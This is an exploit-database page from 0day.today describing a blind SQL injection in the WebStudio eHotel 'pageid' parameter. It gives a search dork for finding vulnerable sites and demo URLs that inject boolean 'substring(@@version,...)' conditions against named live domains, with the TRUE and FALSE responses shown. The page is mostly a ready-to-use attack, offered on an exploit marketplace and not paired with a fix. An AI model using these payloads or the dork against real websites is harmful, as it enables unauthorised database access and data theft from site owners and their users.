[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WebStudio eHotel (pageid) Blind SQL Injection Vulnerability

Author
Hussin X
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4249
Category
web applications
Date add
25-11-2008
Platform
unsorted
===========================================================
WebStudio eHotel (pageid) Blind SQL Injection Vulnerability
===========================================================


WebStudio eHotel (pageid)  Blind SQL Injection Vulnerability
___________________________________

Author: Hussin X
___________________________________

script  : http://www.bdigital.biz/index.php?pageid=216

DorK : "Powered by WebStudio eHotel"

Demo :
_______


http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1,1)=3
( TRUE  )



http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1,1)=4
( FALSE )



http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1,1)=5
( FALSE )



#  0day.today [2024-11-16]  #